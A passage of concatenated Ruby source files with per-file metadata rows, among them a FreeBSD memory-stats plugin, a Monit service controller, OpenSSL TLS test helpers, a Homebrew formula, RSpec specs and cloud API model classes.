so = shell_out("sysctl -n vm.stats.vm.v_page_size")
memory[:page_size] = so.stdout.split($/)[0]
so = shell_out("sysctl -n vm.stats.vm.v_page_count")
memory[:page_count] = so.stdout.split($/)[0]
memory[:total] = memory[:page_size].to_i * memory[:page_count].to_i
so = shell_out("sysctl -n vm.stats.vm.v_free_count")
memory[:free] = memory[:page_size].to_i * so.stdout.split($/)[0].to_i
so = shell_out("sysctl -n vm.status.vm.v_active_count")
memory[:active] = memory[:page_size].to_i * so.stdout.split($/)[0].to_i
so = shell_out("sysctl -n vm.status.vm.v_inactive_count")
memory[:inactive] = memory[:page_size].to_i * so.stdout.split($/)[0].to_i
so = shell_out("sysctl -n vm.stats.vm.v_cache_count")
memory[:cache] = memory[:page_size].to_i * so.stdout.split($/)[0].to_i
so = shell_out("sysctl -n vm.stats.vm.v_wire_count")
memory[:wired] = memory[:page_size].to_i * so.stdout.split($/)[0].to_i
so = shell_out("sysctl -n vfs.bufspace")
memory[:buffers] = so.stdout.split($/)[0]
so = shell_out("swapinfo")
so.stdout.lines do |line|
# Device 1K-blocks Used Avail Capacity
# /dev/ad0s1b 253648 0 253648 0%
if line =~ %r{^([\d\w/]+)\s+(\d+)\s+(\d+)\s+(\d+)\s+([\d\%]+)}
mdev = $1
memory[:swap][mdev] = Mash.new
memory[:swap][mdev][:total] = $2
memory[:swap][mdev][:used] = $3
memory[:swap][mdev][:free] = $4
memory[:swap][mdev][:percent_free] = $5
end
end
end
end
| 40.2 | 77 | 0.644693 |
383201ce6513a08d3ef3b5730bb6828d9480e01f | 4,606 | #########################################
# This class provide methods to install, index, or update internal databases
#########################################
class DatabasesSupportInternal < DatabasesSupport
#INIT
def initialize(dir,info)
#First SET provided databases constant
load_repository_info(dir)
#Load previous info from JSON, if exists. Or create new info structure
if File.exist?(File.join(dir,'status_info','databases_status_info.json'))
load_info = JSON.parse(File.read(File.join(dir,'status_info','databases_status_info.json')))
#Merge! loaded info
info.merge!(load_info)
#Init exit trigger
@exit_trigger = false
else
super(info)
info['dir'] = dir
info['installed_databases'] = Array.new
end
end
#SET DEFAULT DATABASES
def set_databases?(action,list,info)
# Replace, remove, add
if !list.empty? && list[0].to_s.downcase != 'default'
super
#save switch
info['modified'] = true
#Set by default
else
if list[0].to_s.downcase == 'default' || info['databases'].empty?
info['databases'] = @@repo_info['databases'].sort
info['modified'] = true
end
end
end
#CHECKS STRUCTURE
def check_structure(dir)
#Build DB structure if it's not present. Exit if dir is not writable by user
['','fastas','indices','status_info'].map { |d| File.join(dir,d) }.select{ |d| !Dir.exist?(d) }.each do |directory|
if File.writable?(File.dirname(directory))
Dir.mkdir(directory)
else
STDERR.puts "ERROR. Writing permissions error, unable to create essential databases structure folder #{directory} at: #{File.dirname(dir)}"
exit(-1)
end
end
end
#CHECK INFO
def check_databases(databases,info,bbtools)
databases = databases.split(/ |,/) if !databases.is_a?(Array)
if databases.empty?
STDERR.puts "WARNING. No databases to check."
return
end
#Info
STDERR.puts "Checking databases status at #{info['dir']}"
#Get info about installation
installation_status = check_installation_status(info['dir'],databases)
installation_status['installed'].each { |db| info['installed_databases'].push(db) if !info['installed_databases'].include?(db) }
if !installation_status['failed'].empty?
STDERR.puts "ERROR. Databases: #{installation_status['failed'].join(" ")} are empty or not installed.\n Databases can be installed (or reinstalled) with --install_databases option."
installation_status['failed'].each { |db| info['installed_databases'].delete(db) if info['installed_databases'].include?(db) }
@exit_trigger = true
return
end
# if !installation_status['obsolete'].empty?
# STDERR.puts "WARNING. Databases: #{installation_status['obsolete']} are NOT updated. You can update them with -i update"
# end
#Check internal databases status
databases.each do |db|
check_database_status(db,info,get_current_fastas(db,info['dir']))
end
#Get info for obsolete databases
if !info['obsolete_databases'].empty?
STDERR.puts "The following databases indices are obsolete:\n #{info['obsolete_databases'].join("\n\s")}"
get_dbs_info(info['obsolete_databases'].select { |d| databases.include?(d) },info)
info['modified'] = true
#Check writing permissions
if !File.writable?(File.join(info['dir'],'indices')) || !File.writable?(File.join(info['dir'],'status_info'))
STDERR.puts "ERROR!. Impossible to update databases (#{info['obsolete_databases'].join(" ")}) index because folders: #{File.join(info['dir'],'indices')} and/or #{File.join(info['dir'],'status_info')} are not writable. Please contact your admin to update your databases or add -c tag to avoid this step."
exit(-1)
else
#Update index!
update_index(info['obsolete_databases'].select { |d| databases.include?(d) },info,bbtools)
end
else
STDERR.puts "All databases indices are updated"
end
end
#Get current fastas
def get_current_fastas(db,dir)
return Dir[File.join(dir,'fastas',db,"*.fasta*")].sort
end
#GET DATABASES INFO
def get_dbs_info(databases,info)
databases = databases.split(/ |,/) if !databases.is_a?(Array)
databases.each do |db_name|
# DB name
info[db_name]['name'] = db_name
#LOAD (or re-load) PATHS
#Fastas folder path
info[db_name]['path'] = File.join(info['dir'],'fastas',db_name)
#Index path
info[db_name]['index'] = File.join(info['dir'],'indices',db_name)
#Error file path
info[db_name]['update_error_file'] = File.join(info['dir'],'status_info','update_stderror_'+db_name+'.txt')
end
#STATUS INFO(fastas,size,name...)
super
end
end
| 39.367521 | 307 | 0.681068 |
ab0512e905f5c323c0f2e8583a5ef9bbb65e959d | 3,098 | module Luban
module Deployment
module Packages
class Monit
class Controller < Luban::Deployment::Service::Controller
module Commands
module Public
def monitor_control_file_name
@monitor_control_file_name ||= 'monitrc'
end
def monit_command
@monit_command ||= "#{monitor_executable} -c #{monitor_control_file_path}"
end
def monitor_command(service_entry)
@monitor_command ||= shell_command("#{monit_command} monitor #{service_entry}")
end
def unmonitor_command(service_entry)
@unmonitor_command ||= shell_command("#{monit_command} unmonitor #{service_entry}")
end
def reload_monitor_command
@reload_monitor_command ||= shell_command("#{monit_command} reload")
end
def check_monitor_command(service_entry, summary: false)
shell_command("#{monit_command} #{summary ? :summary : :status} #{service_entry}")
end
end
include Public
def self.included(base)
base.define_executable 'monit'
end
def process_pattern
@process_pattern ||= "^#{monit_command}"
end
def start_command
@start_command ||= shell_command(monit_command, setup: [])
end
def stop_command
@stop_command ||= shell_command("#{monit_command} quit", setup: [])
end
end
include Commands
alias_method :monitor_executable, :monit_executable
alias_method :monitor_control_file_path, :control_file_path
alias_method :control_file_name, :monitor_control_file_name
def process_stopped?
super and check_process! =~ /the monit daemon is not running$/
end
def process_started?
super and check_process! =~ /^Monit #{package_major_version} uptime:|^Monit uptime:|^The Monit daemon #{package_major_version} uptime:/
end
%i(config_test match_process monitor_process unmonitor_process reload_process).each do |m|
define_method(m) { update_result send("#{__method__}!") }
end
protected
def config_test!
capture(shell_command("#{monit_command} -t"))
end
def check_process!
capture(check_monitor_command(task.args.service_entry, summary: task.opts.summary))
end
def match_process!
capture(shell_command("#{monit_command} procmatch #{task.args.pattern}"))
end
def monitor_process!
capture(monitor_command(task.args.service_entry))
end
def unmonitor_process!
capture(unmonitor_command(task.args.service_entry))
end
def reload_process!
capture(reload_monitor_command)
end
end
end
end
end
end
| 30.98 | 147 | 0.581988 |
1af8f12979c9b601bda60beb10668f8e539ec18b | 91 | require "camome_gc_watcher/version"
module CamomeGcWatcher
# Your code goes here...
end
| 15.166667 | 35 | 0.78022 |
acece9791142015984703dcbb07edacd40fa2f9b | 11,684 | # frozen_string_literal: true
begin
require "openssl"
# Disable FIPS mode for tests for installations
# where FIPS mode would be enabled by default.
# Has no effect on all other installations.
OpenSSL.fips_mode=false
rescue LoadError
end
# Compile OpenSSL with crypto-mdebug and run this test suite with OSSL_MDEBUG=1
# environment variable to enable memory leak check.
if ENV["OSSL_MDEBUG"] == "1"
if OpenSSL.respond_to?(:print_mem_leaks)
OpenSSL.mem_check_start
END {
GC.start
case OpenSSL.print_mem_leaks
when nil
warn "mdebug: check what is printed"
when true
raise "mdebug: memory leaks detected"
end
}
else
warn "OSSL_MDEBUG=1 is specified but OpenSSL is not built with crypto-mdebug"
end
end
require "test/unit"
require "tempfile"
require "socket"
require "envutil"
if defined?(OpenSSL)
module OpenSSL::TestUtils
module Fixtures
module_function
def pkey(name)
OpenSSL::PKey.read(read_file("pkey", name))
rescue OpenSSL::PKey::PKeyError
# TODO: DH parameters can be read by OpenSSL::PKey.read atm
OpenSSL::PKey::DH.new(read_file("pkey", name))
end
def read_file(category, name)
@file_cache ||= {}
@file_cache[[category, name]] ||=
File.read(File.join(__dir__, "fixtures", category, name + ".pem"))
end
def file_path(category, name)
File.join(__dir__, "fixtures", category, name)
end
end
module_function
def generate_cert(dn, key, serial, issuer,
not_before: nil, not_after: nil)
cert = OpenSSL::X509::Certificate.new
issuer = cert unless issuer
cert.version = 2
cert.serial = serial
cert.subject = dn
cert.issuer = issuer.subject
cert.public_key = key
now = Time.now
cert.not_before = not_before || now - 3600
cert.not_after = not_after || now + 3600
cert
end
def issue_cert(dn, key, serial, extensions, issuer, issuer_key,
not_before: nil, not_after: nil, digest: "sha256")
cert = generate_cert(dn, key, serial, issuer,
not_before: not_before, not_after: not_after)
issuer = cert unless issuer
issuer_key = key unless issuer_key
ef = OpenSSL::X509::ExtensionFactory.new
ef.subject_certificate = cert
ef.issuer_certificate = issuer
extensions.each{|oid, value, critical|
cert.add_extension(ef.create_extension(oid, value, critical))
}
cert.sign(issuer_key, digest)
cert
end
def issue_crl(revoke_info, serial, lastup, nextup, extensions,
issuer, issuer_key, digest)
crl = OpenSSL::X509::CRL.new
crl.issuer = issuer.subject
crl.version = 1
crl.last_update = lastup
crl.next_update = nextup
revoke_info.each{|rserial, time, reason_code|
revoked = OpenSSL::X509::Revoked.new
revoked.serial = rserial
revoked.time = time
enum = OpenSSL::ASN1::Enumerated(reason_code)
ext = OpenSSL::X509::Extension.new("CRLReason", enum)
revoked.add_extension(ext)
crl.add_revoked(revoked)
}
ef = OpenSSL::X509::ExtensionFactory.new
ef.issuer_certificate = issuer
ef.crl = crl
crlnum = OpenSSL::ASN1::Integer(serial)
crl.add_extension(OpenSSL::X509::Extension.new("crlNumber", crlnum))
extensions.each{|oid, value, critical|
crl.add_extension(ef.create_extension(oid, value, critical))
}
crl.sign(issuer_key, digest)
crl
end
def get_subject_key_id(cert, hex: true)
asn1_cert = OpenSSL::ASN1.decode(cert)
tbscert = asn1_cert.value[0]
pkinfo = tbscert.value[6]
publickey = pkinfo.value[1]
pkvalue = publickey.value
digest = OpenSSL::Digest::SHA1.digest(pkvalue)
if hex
digest.unpack("H2"*20).join(":").upcase
else
digest
end
end
def openssl?(major = nil, minor = nil, fix = nil, patch = 0)
return false if OpenSSL::OPENSSL_VERSION.include?("LibreSSL")
return true unless major
OpenSSL::OPENSSL_VERSION_NUMBER >=
major * 0x10000000 + minor * 0x100000 + fix * 0x1000 + patch * 0x10
end
def libressl?(major = nil, minor = nil, fix = nil)
version = OpenSSL::OPENSSL_VERSION.scan(/LibreSSL (\d+)\.(\d+)\.(\d+).*/)[0]
return false unless version
!major || (version.map(&:to_i) <=> [major, minor, fix]) >= 0
end
end
class OpenSSL::TestCase < Test::Unit::TestCase
include OpenSSL::TestUtils
extend OpenSSL::TestUtils
def setup
if ENV["OSSL_GC_STRESS"] == "1"
GC.stress = true
end
end
def teardown
if ENV["OSSL_GC_STRESS"] == "1"
GC.stress = false
end
# OpenSSL error stack must be empty
assert_equal([], OpenSSL.errors)
end
end
class OpenSSL::SSLTestCase < OpenSSL::TestCase
RUBY = EnvUtil.rubybin
ITERATIONS = ($0 == __FILE__) ? 100 : 10
def setup
super
@ca_key = Fixtures.pkey("rsa-1")
@svr_key = Fixtures.pkey("rsa-2")
@cli_key = Fixtures.pkey("rsa-3")
@ca = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/CN=CA")
@svr = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/CN=localhost")
@cli = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/CN=localhost")
ca_exts = [
["basicConstraints","CA:TRUE",true],
["keyUsage","cRLSign,keyCertSign",true],
]
ee_exts = [
["keyUsage","keyEncipherment,digitalSignature",true],
]
@ca_cert = issue_cert(@ca, @ca_key, 1, ca_exts, nil, nil)
@svr_cert = issue_cert(@svr, @svr_key, 2, ee_exts, @ca_cert, @ca_key)
@cli_cert = issue_cert(@cli, @cli_key, 3, ee_exts, @ca_cert, @ca_key)
@server = nil
end
def tls12_supported?
ctx = OpenSSL::SSL::SSLContext.new
ctx.min_version = ctx.max_version = OpenSSL::SSL::TLS1_2_VERSION
true
rescue
end
def readwrite_loop(ctx, ssl)
while line = ssl.gets
ssl.write(line)
end
end
def start_server(verify_mode: OpenSSL::SSL::VERIFY_NONE, start_immediately: true,
ctx_proc: nil, server_proc: method(:readwrite_loop),
accept_proc: proc{},
ignore_listener_error: false, &block)
IO.pipe {|stop_pipe_r, stop_pipe_w|
store = OpenSSL::X509::Store.new
store.add_cert(@ca_cert)
store.purpose = OpenSSL::X509::PURPOSE_SSL_CLIENT
ctx = OpenSSL::SSL::SSLContext.new
ctx.cert_store = store
ctx.cert = @svr_cert
ctx.key = @svr_key
ctx.tmp_dh_callback = proc { Fixtures.pkey("dh-1") }
ctx.verify_mode = verify_mode
ctx_proc.call(ctx) if ctx_proc
Socket.do_not_reverse_lookup = true
tcps = TCPServer.new("127.0.0.1", 0)
port = tcps.connect_address.ip_port
ssls = OpenSSL::SSL::SSLServer.new(tcps, ctx)
ssls.start_immediately = start_immediately
threads = []
begin
server_thread = Thread.new do
if Thread.method_defined?(:report_on_exception=) # Ruby >= 2.4
Thread.current.report_on_exception = false
end
begin
loop do
begin
readable, = IO.select([ssls, stop_pipe_r])
break if readable.include? stop_pipe_r
ssl = ssls.accept
accept_proc.call(ssl)
rescue OpenSSL::SSL::SSLError, IOError, Errno::EBADF, Errno::EINVAL,
Errno::ECONNABORTED, Errno::ENOTSOCK, Errno::ECONNRESET
retry if ignore_listener_error
raise
end
th = Thread.new do
if Thread.method_defined?(:report_on_exception=)
Thread.current.report_on_exception = false
end
begin
server_proc.call(ctx, ssl)
ensure
ssl.close
end
true
end
threads << th
end
ensure
tcps.close
end
end
client_thread = Thread.new do
if Thread.method_defined?(:report_on_exception=)
Thread.current.report_on_exception = false
end
begin
block.call(port)
ensure
# Stop accepting new connection
stop_pipe_w.close
server_thread.join
end
end
threads.unshift client_thread
ensure
# Terminate existing connections. If a thread did 'pend', re-raise it.
pend = nil
threads.each { |th|
begin
timeout = EnvUtil.apply_timeout_scale(30)
th.join(timeout) or
th.raise(RuntimeError, "[start_server] thread did not exit in #{timeout} secs")
rescue (defined?(MiniTest::Skip) ? MiniTest::Skip : Test::Unit::PendedError)
# MiniTest::Skip is for the Ruby tree
pend = $!
rescue Exception
end
}
raise pend if pend
assert_join_threads(threads)
end
}
end
end
class OpenSSL::PKeyTestCase < OpenSSL::TestCase
def check_component(base, test, keys)
keys.each { |comp|
assert_equal base.send(comp), test.send(comp)
}
end
def dup_public(key)
case key
when OpenSSL::PKey::RSA
rsa = OpenSSL::PKey::RSA.new
rsa.set_key(key.n, key.e, nil)
rsa
when OpenSSL::PKey::DSA
dsa = OpenSSL::PKey::DSA.new
dsa.set_pqg(key.p, key.q, key.g)
dsa.set_key(key.pub_key, nil)
dsa
when OpenSSL::PKey::DH
dh = OpenSSL::PKey::DH.new
dh.set_pqg(key.p, nil, key.g)
dh
else
if defined?(OpenSSL::PKey::EC) && OpenSSL::PKey::EC === key
ec = OpenSSL::PKey::EC.new(key.group)
ec.public_key = key.public_key
ec
else
raise "unknown key type"
end
end
end
end
module OpenSSL::Certs
include OpenSSL::TestUtils
module_function
def ca_cert
ca = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/CN=Timestamp Root CA")
ca_exts = [
["basicConstraints","CA:TRUE,pathlen:1",true],
["keyUsage","keyCertSign, cRLSign",true],
["subjectKeyIdentifier","hash",false],
["authorityKeyIdentifier","keyid:always",false],
]
OpenSSL::TestUtils.issue_cert(ca, Fixtures.pkey("rsa2048"), 1, ca_exts, nil, nil)
end
def ts_cert_direct(key, ca_cert)
dn = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/OU=Timestamp/CN=Server Direct")
exts = [
["basicConstraints","CA:FALSE",true],
["keyUsage","digitalSignature, nonRepudiation", true],
["subjectKeyIdentifier", "hash",false],
["authorityKeyIdentifier","keyid,issuer", false],
["extendedKeyUsage", "timeStamping", true]
]
OpenSSL::TestUtils.issue_cert(dn, key, 2, exts, ca_cert, Fixtures.pkey("rsa2048"))
end
def intermediate_cert(key, ca_cert)
dn = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/OU=Timestamp/CN=Timestamp Intermediate CA")
exts = [
["basicConstraints","CA:TRUE,pathlen:0",true],
["keyUsage","keyCertSign, cRLSign",true],
["subjectKeyIdentifier","hash",false],
["authorityKeyIdentifier","keyid:always",false],
]
OpenSSL::TestUtils.issue_cert(dn, key, 3, exts, ca_cert, Fixtures.pkey("rsa2048"))
end
def ts_cert_ee(key, intermediate, im_key)
dn = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/OU=Timestamp/CN=Server End Entity")
exts = [
["keyUsage","digitalSignature, nonRepudiation", true],
["subjectKeyIdentifier", "hash",false],
["authorityKeyIdentifier","keyid,issuer", false],
["extendedKeyUsage", "timeStamping", true]
]
OpenSSL::TestUtils.issue_cert(dn, key, 4, exts, intermediate, im_key)
end
end
end
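# Illustrative sketch (not part of the original helpers): minting a self-signed
# CA certificate with issue_cert, mirroring how SSLTestCase builds @ca_cert.
# The key size and DN are arbitrary example values; guarded so it only runs
# when this file is executed directly.
if $PROGRAM_NAME == __FILE__ && defined?(OpenSSL)
example_key = OpenSSL::PKey::RSA.new(2048)
example_dn  = OpenSSL::X509::Name.parse("/DC=org/DC=example/CN=Example CA")
ca_exts = [
["basicConstraints", "CA:TRUE", true],
["keyUsage", "cRLSign,keyCertSign", true],
]
# nil issuer / issuer key makes the certificate self-signed
example_ca = OpenSSL::TestUtils.issue_cert(example_dn, example_key, 1, ca_exts, nil, nil)
puts example_ca.subject
end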
| 29.356784 | 100 | 0.623331 |
b9947b9144484694ac304807025332f0bde22e08 | 1,396 | # table_catalog | postgres_to_redshift
# table_schema | public
# table_name | acquisition_pages
# table_type | BASE TABLE
# self_referencing_column_name |
# reference_generation |
# user_defined_type_catalog |
# user_defined_type_schema |
# user_defined_type_name |
# is_insertable_into | YES
# is_typed | NO
# commit_action |
#
class Helper
class Table
attr_accessor :attributes, :columns
def initialize(attributes: , columns: [])
self.attributes = attributes
self.columns = columns
end
def name
attributes["table_name"]
end
alias_method :to_s, :name
def target_table_name
name.gsub(/_view$/, '')
end
def columns=(column_definitions = [])
@columns = column_definitions.map do |column_definition|
Column.new(attributes: column_definition)
end
end
def columns_for_create
columns.map do |column|
column.name == 'id' ? %Q["#{column.name}" #{column.data_type_for_copy} sortkey distkey] : %Q["#{column.name}" #{column.data_type_for_copy}]
end.join(", ")
end
def columns_for_copy
columns.map do |column|
column.name_for_copy
end.join(", ")
end
def is_view?
attributes["table_type"] == "VIEW"
end
end
end
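# Illustrative usage sketch (not part of the original file): shows the
# view-to-table name mapping above using a hypothetical information_schema row.
if $PROGRAM_NAME == __FILE__
table = Helper::Table.new(attributes: { "table_name" => "events_view", "table_type" => "VIEW" })
puts table.name               # => "events_view"
puts table.target_table_name  # => "events"
puts table.is_view?           # => true
end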
| 25.381818 | 147 | 0.603868 |
38bf41dc89360ca35d7eb7d50b304040471c9146 | 971 | require 'spec_helper'
describe Wombat do
it 'should provide syntactic sugar method Wombat.crawl' do
Wombat.should respond_to(:crawl)
end
it 'should provide syntactic sugar method Wombat.scrape' do
Wombat.should respond_to(:scrape)
end
it 'should redirect .scrape to .crawl' do
fake_class = double :fake
fake_class.stub :include
fake_class.should_receive(:new).and_return(double(crawl: nil))
Class.stub :new => fake_class
Wombat.scrape
end
it 'should provide configuration method with block' do
Wombat.configure do |config|
config.set_proxy "10.0.0.1", 8080
end
Wombat.proxy_args.should == ["10.0.0.1", 8080]
end
it 'should accept regular properties (non-selectors)' do
VCR.use_cassette('broken_selector') do
lambda {
Wombat.crawl do
base_url "http://www.github.com"
path "/"
source :obaoba
description 'Oba Oba'
website 'http://obaoba.com.br'
end
}.should_not raise_error
end
end
end
| 23.682927 | 64 | 0.709578 |
18d8122474df8042e0cc0a0bd6d8b4b18e8cabb5 | 199 | # Copyright (c) 2010-2011, Diaspora Inc. This file is
# licensed under the Affero General Public License version 3 or later. See
# the COPYRIGHT file.
module Diaspora
autoload :Parser
end
| 24.875 | 77 | 0.733668 |
e834fa9b640a76ab619fec4fc8dcfcb9d6cbbf2b | 1,695 | require 'spec_helper'
describe TeamMembersController do
before do
@team = Factory(:team)
@user = Factory(:user)
@admin = Factory(:team_member, :user => @user, :team => @team, :admin => true)
sign_in @user
end
describe 'update' do
it 'should promote if user was not admin on success' do
person = Factory(:person)
user = Factory(:user, :person => person)
request.env['HTTP_REFERER'] = '/art-application/people'
team_member = Factory(:team_member, :team => @team, :user => user, :admin => false)
put :update, :id => team_member.id
flash[:success].should == "#{team_member.user.person.name} has been promoted to admin for #{@team.name}"
end
it 'should demote if user was admin on success' do
person = Factory(:person)
user = Factory(:user, :person => person)
request.env['HTTP_REFERER'] = '/art-application/people'
team_member = Factory(:team_member, :team => @team, :user => user, :admin => true)
put :update, :id => team_member.id
flash[:success].should == "#{team_member.user.person.name} has been demoted from admin of #{@team.name}"
end
it 'should render flash[:error] if current user is not admin' do
@admin.admin = false
@admin.save!
person = Factory(:person)
user = Factory(:user, :person => person)
request.env['HTTP_REFERER'] = '/art-application/people'
team_member = Factory(:team_member, :team => @team, :user => user)
put :update, :id => team_member.id
flash[:error].should == 'You gotta have power to promote folks around here'
end
end
pending 'toggle_admin_status'
pending 'promote'
pending 'demote'
end
| 36.847826 | 110 | 0.641298 |
bbebf3cd68dc65406e95744c5b60e12a5de84a29 | 3,198 | class Goolabs < Formula
desc "Command-line tool for morphologically analyzing Japanese language"
homepage "https://pypi.python.org/pypi/goolabs"
url "https://files.pythonhosted.org/packages/ce/86/2d3b5bd85311ee3a7ae7a661b3619095431503cd0cae03048c646b700cad/goolabs-0.4.0.tar.gz"
sha256 "4f768a5b98960c507f5ba4e1ca14d45e3139388669148a2750d415c312281527"
revision 1
bottle do
cellar :any_skip_relocation
sha256 "f2bdf5b949e9e088544c083e495d9e1b78374a9fadb8c22ab78d41288c0709ef" => :catalina
sha256 "56e26842d65342cb5aeb31c22a07bb64e5b04349c8ab17b7085d13bd19923305" => :mojave
sha256 "a3228c96960feacfa6a7f6e637261c4214600da27ce48e2fafa73d009c2401a7" => :high_sierra
sha256 "1e49980130952d980e63548980b6c37163e5e540d833f8d50745595d8d45eaee" => :sierra
end
depends_on "python"
resource "certifi" do
url "https://files.pythonhosted.org/packages/23/3f/8be01c50ed24a4bd6b8da799839066ce0288f66f5e11f0367323467f0cbc/certifi-2017.11.5.tar.gz"
sha256 "5ec74291ca1136b40f0379e1128ff80e866597e4e2c1e755739a913bbc3613c0"
end
resource "chardet" do
url "https://files.pythonhosted.org/packages/fc/bb/a5768c230f9ddb03acc9ef3f0d4a3cf93462473795d18e9535498c8f929d/chardet-3.0.4.tar.gz"
sha256 "84ab92ed1c4d4f16916e05906b6b75a6c0fb5db821cc65e70cbd64a3e2a5eaae"
end
resource "click" do
url "https://files.pythonhosted.org/packages/95/d9/c3336b6b5711c3ab9d1d3a80f1a3e2afeb9d8c02a7166462f6cc96570897/click-6.7.tar.gz"
sha256 "f15516df478d5a56180fbf80e68f206010e6d160fc39fa508b65e035fd75130b"
end
resource "idna" do
url "https://files.pythonhosted.org/packages/f4/bd/0467d62790828c23c47fc1dfa1b1f052b24efdf5290f071c7a91d0d82fd3/idna-2.6.tar.gz"
sha256 "2c6a5de3089009e3da7c5dde64a141dbc8551d5b7f6cf4ed7c2568d0cc520a8f"
end
resource "requests" do
url "https://files.pythonhosted.org/packages/b0/e1/eab4fc3752e3d240468a8c0b284607899d2fbfb236a56b7377a329aa8d09/requests-2.18.4.tar.gz"
sha256 "9c443e7324ba5b85070c4a818ade28bfabedf16ea10206da1132edaa6dda237e"
end
resource "six" do
url "https://files.pythonhosted.org/packages/16/d8/bc6316cf98419719bd59c91742194c111b6f2e85abac88e496adefaf7afe/six-1.11.0.tar.gz"
sha256 "70e8a77beed4562e7f14fe23a786b54f6296e34344c23bc42f07b15018ff98e9"
end
resource "urllib3" do
url "https://files.pythonhosted.org/packages/ee/11/7c59620aceedcc1ef65e156cc5ce5a24ef87be4107c2b74458464e437a5d/urllib3-1.22.tar.gz"
sha256 "cc44da8e1145637334317feebd728bd869a35285b93cbb4cca2577da7e62db4f"
end
def install
xy = Language::Python.major_minor_version "python3"
ENV["PYTHONPATH"] = libexec/"vendor/lib/python#{xy}/site-packages"
ENV.prepend_create_path "PYTHONPATH", libexec/"lib/python#{xy}/site-packages"
resources.each do |r|
r.stage do
system "python3", *Language::Python.setup_install_args(libexec/"vendor")
end
end
system "python3", *Language::Python.setup_install_args(libexec)
bin.install Dir["#{libexec}/bin/*"]
bin.env_script_all_files(libexec/"bin", :PYTHONPATH => ENV["PYTHONPATH"])
end
test do
assert_match "Usage: goolabs morph", shell_output("#{bin}/goolabs morph test 2>&1", 2)
end
end
| 43.216216 | 141 | 0.799875 |
f7704e61b4e00b79674d343bc482d6bf187d2a66 | 3,374 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::MediaServices::Mgmt::V2018_03_30_preview
module Models
#
# Describes all the settings to be used when encoding the input video with
# the Standard Encoder.
#
class StandardEncoderPreset < Preset
include MsRestAzure
def initialize
@odatatype = "#Microsoft.Media.StandardEncoderPreset"
end
attr_accessor :odatatype
# @return [Filters] One or more filtering operations that are applied to
# the input media before encoding.
attr_accessor :filters
# @return [Array<Codec>] The list of codecs to be used when encoding the
# input video.
attr_accessor :codecs
# @return [Array<Format>] The list of outputs to be produced by the
# encoder.
attr_accessor :formats
#
# Mapper for StandardEncoderPreset class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: '#Microsoft.Media.StandardEncoderPreset',
type: {
name: 'Composite',
class_name: 'StandardEncoderPreset',
model_properties: {
odatatype: {
client_side_validation: true,
required: true,
serialized_name: '@odata\\.type',
type: {
name: 'String'
}
},
filters: {
client_side_validation: true,
required: false,
serialized_name: 'filters',
type: {
name: 'Composite',
class_name: 'Filters'
}
},
codecs: {
client_side_validation: true,
required: false,
serialized_name: 'codecs',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'CodecElementType',
type: {
name: 'Composite',
polymorphic_discriminator: '@odata.type',
uber_parent: 'Codec',
class_name: 'Codec'
}
}
}
},
formats: {
client_side_validation: true,
required: false,
serialized_name: 'formats',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'FormatElementType',
type: {
name: 'Composite',
polymorphic_discriminator: '@odata.type',
uber_parent: 'Format',
class_name: 'Format'
}
}
}
}
}
}
}
end
end
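    # Minimal usage sketch (illustrative only; the codec/format objects below are
    # placeholders, not values taken from a real encoding job):
    #
    #   preset = StandardEncoderPreset.new
    #   preset.codecs  = [aac_audio_codec, h264_video_codec]
    #   preset.formats = [mp4_format]
    #   StandardEncoderPreset.mapper # => hash driving MsRest (de)serialization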
end
end
| 30.396396 | 78 | 0.474215 |
1ab474dcc593da0e9eae9ce543d3256b0fbce284 | 623 | require 'tok'
require 'rails'
module Tok
class Engine < Rails::Engine
isolate_namespace Tok
initializer :append_migrations do |app|
if model_exist?
config.paths["db/migrate"].expanded.each do |expanded_path|
app.config.paths["db/migrate"] << expanded_path
end
end
end
initializer :filter_params do |app|
app.config.filter_parameters += [:encrypted_password, :password, :authentication_token, :token]
end
private
def model_exist?
Rails.env.test? ? true : File.exist?(File.expand_path('app/models/user.rb', Rails.root))
end
end
end
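# Note on :append_migrations (behaviour assumed from the standard Rails engine
# pattern): adding the engine's db/migrate path to the host application's
# migration paths lets `rails db:migrate` in the host pick up Tok's migrations
# directly, without copying them in via an install:migrations task.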
| 23.074074 | 101 | 0.664526 |
91487a72bc58875f1926ad7caeadf20465a8412a | 10,959 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Google
module Api
# Defines a metric type and its schema. Once a metric descriptor is created,
# deleting or altering it stops data collection and makes the metric type's
# existing data unusable.
# @!attribute [rw] name
# @return [String]
# The resource name of the metric descriptor.
# @!attribute [rw] type
# @return [String]
# The metric type, including its DNS name prefix. The type is not
# URL-encoded. All user-defined metric types have the DNS name
# `custom.googleapis.com` or `external.googleapis.com`. Metric types should
# use a natural hierarchical grouping. For example:
#
# "custom.googleapis.com/invoice/paid/amount"
# "external.googleapis.com/prometheus/up"
# "appengine.googleapis.com/http/server/response_latencies"
# @!attribute [rw] labels
# @return [Array<Google::Api::LabelDescriptor>]
# The set of labels that can be used to describe a specific
# instance of this metric type. For example, the
# `appengine.googleapis.com/http/server/response_latencies` metric
# type has a label for the HTTP response code, `response_code`, so
# you can look at latencies for successful responses or just
# for responses that failed.
# @!attribute [rw] metric_kind
# @return [Google::Api::MetricDescriptor::MetricKind]
# Whether the metric records instantaneous values, changes to a value, etc.
# Some combinations of `metric_kind` and `value_type` might not be supported.
# @!attribute [rw] value_type
# @return [Google::Api::MetricDescriptor::ValueType]
# Whether the measurement is an integer, a floating-point number, etc.
